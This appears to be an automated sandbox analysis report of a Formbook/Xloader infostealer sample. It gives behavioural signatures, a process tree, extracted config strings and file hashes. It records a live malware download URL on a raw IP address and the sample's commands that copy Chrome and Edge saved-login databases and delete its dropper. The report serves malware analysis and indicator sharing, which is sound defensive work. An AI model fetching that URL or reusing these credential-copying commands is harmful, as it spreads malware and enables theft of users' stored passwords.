Analysis
-
max time kernel
266s -
max time network
268s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
-
submitted
28-02-2023 10:44
General
-
Target
http://64.93.80.190/tue.exe
Malware Config
Extracted
formbook
poub
WY0eksfISzRg4O6c+opnGL6gaw==
moRjn9ExtYi8UmUo+Tya
2vME+GedoxzFnuLXesUoVj4=
EvW4JWJ1NQ8nN3tA3SM=
2mK9efMZMgN1VOs=
8d0jua5b0J6AQEW7
/2cyThOd37DSTYMASDye4Q0t/Vs=
ral+tbIh2KKAQEW7
YLY9jsPtYB/FRmMo+Tya
R1WcElWAMtFxFrVqtZT2ZpIS9xRZNho=
KFXGg/T1pCC9GjrxUPTcjw==
8mMlK5nDwjjPFTP5jMtAtQ0t/Vs=
c7am8nhhlCo=
UW91trZj6dENxuRdpxOvW1Cf
sjOMUcvq6lYJCZEfV4euFzY=
62nBgPjdmWQkmWElww==
64E8JqA1aruSUvw=
NqI1reXpcR+REye0
8+y1oOsbjgSyEhjXUPTcjw==
Rx9by8gNBwN1VOs=
Signatures
-
Formbook
Formbook is a data stealing malware which is capable of stealing data.
-
Xloader
Xloader is a rebranded version of Formbook malware.
-
Xloader payload 4 IoCs
-
Adds policy Run key to start application 2 TTPs 2 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
-
Modifies Internet Explorer settings 1 TTPs 35 IoCs
-
Modifies registry class 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 8 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 42 IoCs
-
Suspicious use of FindShellTrayWindow 12 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://64.93.80.190/tue.exe2⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1264 CREDAT:17410 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1IYUAPIF\tue.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1IYUAPIF\tue.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tkgcahr.exe"C:\Users\Admin\AppData\Local\Temp\tkgcahr.exe" C:\Users\Admin\AppData\Local\Temp\lscnelih.s4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\tkgcahr.exe"C:\Users\Admin\AppData\Local\Temp\tkgcahr.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Adds policy Run key to start application
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\tkgcahr.exe"3⤵
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\ResizeFind.htm2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb355e46f8,0x7ffb355e4708,0x7ffb355e47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff635905460,0x7ff635905470,0x7ff6359054804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,5681649032327908037,12372578924824321849,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3144 /prefetch:23⤵
-
C:\Program Files (x86)\Zblrdptj\vgakncx7bm.exe"C:\Program Files (x86)\Zblrdptj\vgakncx7bm.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 6003⤵
- Program crash
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1720 -ip 17201⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Zblrdptj\vgakncx7bm.exeFilesize
130KB
MD5dede21ce3a763370f572d69e9d4e7291
SHA15aafe471f5179d3914b2c02443641891ae5a29d3
SHA2566f9ca0d8b6ed0781b4fab0ec9d5b2e225ff9816fa8de76f9376161ecbbab05da
SHA512f85778bea03fc274554adbd74e8e13342ffe1d1716d69a28ae8a73d77c517d75e086b77eb2af707eacfc687b871c7f2e224d97d736940fad46921b6b8d54ea96
-
C:\Program Files (x86)\Zblrdptj\vgakncx7bm.exeFilesize
130KB
MD5dede21ce3a763370f572d69e9d4e7291
SHA15aafe471f5179d3914b2c02443641891ae5a29d3
SHA2566f9ca0d8b6ed0781b4fab0ec9d5b2e225ff9816fa8de76f9376161ecbbab05da
SHA512f85778bea03fc274554adbd74e8e13342ffe1d1716d69a28ae8a73d77c517d75e086b77eb2af707eacfc687b871c7f2e224d97d736940fad46921b6b8d54ea96
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5cd4f5fe0fc0ab6b6df866b9bfb9dd762
SHA1a6aaed363cd5a7b6910e9b3296c0093b0ac94759
SHA2563b803b53dbd3d592848fc66e5715f39f6bc02cbc95fb2452cd5822d98c6b8f81
SHA5127072630ec28cf6a8d5b072555234b5150c1e952138e5cdc29435a6242fda4b4217b81fb57acae927d2b908fa06f36414cb3fab35110d63107141263e3bba9676
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD51d40312629d09d2420e992fdb8a78c1c
SHA1903950d5ba9d64ec21c9f51264272ca8dfae9540
SHA2561e7c6aa575c3ec46cd1fdf6df51063113d277012ed28f5f6b37aea95cd3a64ac
SHA512a7073247ae95e451ed32ceeae91c6638192c15eaad718875c1272eff51c0564016d9f84690543f27df509a7d579de329d101fbf82fed7cbeb27af57393de24ac
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.icoFilesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.icoFilesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnkFilesize
2KB
MD528f103ebc6c2f4d9d3f83fac6c25242d
SHA1855084520f7626fbede7323a9b2e03306009f135
SHA2566ce633d0d024c36c36e5bc3d944cbd5f453fe866fd978cba16fba695074b1c7c
SHA5128835c9217f891844d40fa0090a1b889f64071e7723c9bafaae07d4f74758fab05db62d3b13fc25c2802cb9a70803721b824d15c7ef35b19c9d923c629c69085f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5536d3af2d02ee8819b970b0d38f81aa7
SHA1b18d8479cbe19e1d383dc7d1dabee39622ecc42b
SHA256ae114bed6a38b86e3f06037f17466441109b86bc843baa3e28fd6181e51128e9
SHA5127aa0420c73b447f4adb237f396c0d8fe406fcda319ad02c1aa695654586b51ab7a80a6fd3460f839599324f44a63d101226d3ebff7682b496d0b64953b8e369a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD56fcf142326e58969b09e25c9de04cdb4
SHA179e5ad096c8c91837ea8ed72df2767d8a5621a7d
SHA25675e6402aad658037eaef485e207918a88836a9a7dfc0738443bb4bcbc934c61c
SHA51270aaa955ed6f70e494202ddf8bcfb3886f18c2100509018668280b60bef07277af06526a9b083c45b2c6a0f0d70d9b2073c8957791688694505e9f6aa8ba2879
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD51b4f3dd40e2ef0911d27fc84171b6995
SHA1a7a5b3ef81eead381313431362f5e205334e8507
SHA256daf21b5e3ce3958ba7906fb2f045bdaaf798ccd3ca07349c744ddcc95396bbfa
SHA5126edd680d37bc6523b9ac86cb0fbe93e7bde644990bf61eb93902c67840e4fb91595bd0312f9467583a589df00478a16406bdbf450defb5c5abd55f44a55366ca
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
24KB
MD51463bf2a54e759c40d9ad64228bf7bec
SHA12286d0ac3cfa9f9ca6c0df60699af7c49008a41f
SHA2569b4fd2eea856352d8fff054b51ea5d6141a540ca253a2e4dc28839bc92cbf4df
SHA51233e0c223b45acac2622790dda4b59a98344a89094c41ffdb2531d7f1c0db86a0ea4f1885fea7c696816aa4ceab46de6837cc081cd8e63e3419d9fcb8c5a0eb66
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
9KB
MD52811268bdd6a50ba01fb550efaf68c36
SHA1280dc4cdd213b8adf9342efc81a064c4b6f1117a
SHA256377a79805b31b51ec67440ccf4c369c60663493dfaec6a58216e75aca55dfb88
SHA512afef9e0533ba8140f19a229e1a404b87ce5fe8f8a32c9af3001437bc56946157f1e702b7e11f6ebe0cc31ae196dc4c46e441da79917836aedc64f140ae387217
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD581857993e9d880553078ba9f7ca9a5e9
SHA16a68241aac5ded7588e7e2235c2bede2e40ee764
SHA2567ca961415f983bc017c7a7181bdd6632ad17577bf0a94eaedaf7790e43e2aa7a
SHA5123af14fc7e79a73968fae6a35620feefda11021e0c47342a7b9ba09469977c10962dc04ca5b1c3baffa304bf319771359faf2fa618c8a9126d263d3cc144d6e45
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
28KB
MD52be7224f36937646012a834e3998d452
SHA19e07da3a5fdfec9749283a84b18a940e935f1989
SHA2565a6563614ba4504b6213e3823d2336ccee5ecfb74dbc377cfca70fcab9496291
SHA51248a2d2ac39d50abd6867e517dd4a308469e2be881d8e8fce4f5bf3b90cdab49bb8738fe59bd4e2d35a1fd470155dc8ff6b5b56f7591068d9ea7e6a7b8911793b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1IYUAPIF\tue.exeFilesize
286KB
MD55d7af334812811e24e911aa5e7468184
SHA1e0b1d2b8236917892e9bfa5b5262d118a08dd5ab
SHA256ffb63b1c0f03e57910b1f9b67f89bfe69768e5121ed5a0ecfc3af93dd6bc4c1f
SHA51271e5d63eb4ef2929112d472113822b91b0a115b44ea08f5fa39f95246c83088a2062c8217cd8b158c7595b4e6ddb38337c580c1c8fb6a9df9193e2794223a148
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1IYUAPIF\tue.exe.2zffbv6.partialFilesize
286KB
MD55d7af334812811e24e911aa5e7468184
SHA1e0b1d2b8236917892e9bfa5b5262d118a08dd5ab
SHA256ffb63b1c0f03e57910b1f9b67f89bfe69768e5121ed5a0ecfc3af93dd6bc4c1f
SHA51271e5d63eb4ef2929112d472113822b91b0a115b44ea08f5fa39f95246c83088a2062c8217cd8b158c7595b4e6ddb38337c580c1c8fb6a9df9193e2794223a148
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YYL8D8JJ\tue[1].exeFilesize
286KB
MD55d7af334812811e24e911aa5e7468184
SHA1e0b1d2b8236917892e9bfa5b5262d118a08dd5ab
SHA256ffb63b1c0f03e57910b1f9b67f89bfe69768e5121ed5a0ecfc3af93dd6bc4c1f
SHA51271e5d63eb4ef2929112d472113822b91b0a115b44ea08f5fa39f95246c83088a2062c8217cd8b158c7595b4e6ddb38337c580c1c8fb6a9df9193e2794223a148
-
C:\Users\Admin\AppData\Local\Temp\DB1Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
C:\Users\Admin\AppData\Local\Temp\DB1Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
C:\Users\Admin\AppData\Local\Temp\Zblrdptj\vgakncx7bm.exeFilesize
130KB
MD5dede21ce3a763370f572d69e9d4e7291
SHA15aafe471f5179d3914b2c02443641891ae5a29d3
SHA2566f9ca0d8b6ed0781b4fab0ec9d5b2e225ff9816fa8de76f9376161ecbbab05da
SHA512f85778bea03fc274554adbd74e8e13342ffe1d1716d69a28ae8a73d77c517d75e086b77eb2af707eacfc687b871c7f2e224d97d736940fad46921b6b8d54ea96
-
C:\Users\Admin\AppData\Local\Temp\lscnelih.sFilesize
5KB
MD5663b9828eb94c8cffc4722dcb8810cee
SHA1b99a8142a609a1d32b836bc4d2879a1399f9ebe4
SHA256a275aab03a00e9d322d639c842e53f9ebd4578fb792e25bff0cc4aca2bf86401
SHA512d4497fce6de8a5a8f302efde70c5ce1c9ad5f95a0e1d6da38ed4a9b24c1af70ec699bbc84f33bdeeada2329466db220dd7ade31f44cba964817ca01c16d68ca5
-
C:\Users\Admin\AppData\Local\Temp\tkgcahr.exeFilesize
130KB
MD5dede21ce3a763370f572d69e9d4e7291
SHA15aafe471f5179d3914b2c02443641891ae5a29d3
SHA2566f9ca0d8b6ed0781b4fab0ec9d5b2e225ff9816fa8de76f9376161ecbbab05da
SHA512f85778bea03fc274554adbd74e8e13342ffe1d1716d69a28ae8a73d77c517d75e086b77eb2af707eacfc687b871c7f2e224d97d736940fad46921b6b8d54ea96
-
C:\Users\Admin\AppData\Local\Temp\tkgcahr.exeFilesize
130KB
MD5dede21ce3a763370f572d69e9d4e7291
SHA15aafe471f5179d3914b2c02443641891ae5a29d3
SHA2566f9ca0d8b6ed0781b4fab0ec9d5b2e225ff9816fa8de76f9376161ecbbab05da
SHA512f85778bea03fc274554adbd74e8e13342ffe1d1716d69a28ae8a73d77c517d75e086b77eb2af707eacfc687b871c7f2e224d97d736940fad46921b6b8d54ea96
-
C:\Users\Admin\AppData\Local\Temp\tkgcahr.exeFilesize
130KB
MD5dede21ce3a763370f572d69e9d4e7291
SHA15aafe471f5179d3914b2c02443641891ae5a29d3
SHA2566f9ca0d8b6ed0781b4fab0ec9d5b2e225ff9816fa8de76f9376161ecbbab05da
SHA512f85778bea03fc274554adbd74e8e13342ffe1d1716d69a28ae8a73d77c517d75e086b77eb2af707eacfc687b871c7f2e224d97d736940fad46921b6b8d54ea96
-
C:\Users\Admin\AppData\Local\Temp\ycrlvlm.fmFilesize
196KB
MD59f83347bac30a5ad401e3d1ec33f08d0
SHA1a7ebf73447d07ada006d91a5eda2cef1a9b4685e
SHA25659c029c13fa82b4c420e8e8b3e9ed8d09c5fa451d0023bac00066a795ee0e2e6
SHA5128d7fcd7c01cfb42f62719e08b4c3fe29a3f475a190af825764c67285193efc335f843222d8e5d66a94155e22ff535cfee9a2f861805acbb8faaf8da5c6585dbc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnkFilesize
2KB
MD528f103ebc6c2f4d9d3f83fac6c25242d
SHA1855084520f7626fbede7323a9b2e03306009f135
SHA2566ce633d0d024c36c36e5bc3d944cbd5f453fe866fd978cba16fba695074b1c7c
SHA5128835c9217f891844d40fa0090a1b889f64071e7723c9bafaae07d4f74758fab05db62d3b13fc25c2802cb9a70803721b824d15c7ef35b19c9d923c629c69085f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-msFilesize
3KB
MD549d0d62fb733dab17bab697d2f85049c
SHA1e0d5d3586073e33450e62db71db6abe87d5f2b82
SHA2561d3229d7e04f747c4d00d63d38bbe3de45dd5aa9f48296f5754d4105787398ef
SHA512ac8a14f4afb9719dc4bbe3d9209ee4fad15c718b3a95d28bba44ae1f960e3461df88c0236ca9baa60be188d3a4bc432a35aeef41c22f2a2e2fc135fd6e994923
-
C:\Users\Admin\Desktop\Microsoft Edge.lnkFilesize
2KB
MD51240f4bc4d304de79b64c02a2d6b33fd
SHA11d3cf62a38301b5a64efe0a68e306e9e57e674e3
SHA256310416f8bc3b505fae9b1348c623512a6439e52513aadba4b5bc9d55da107dae
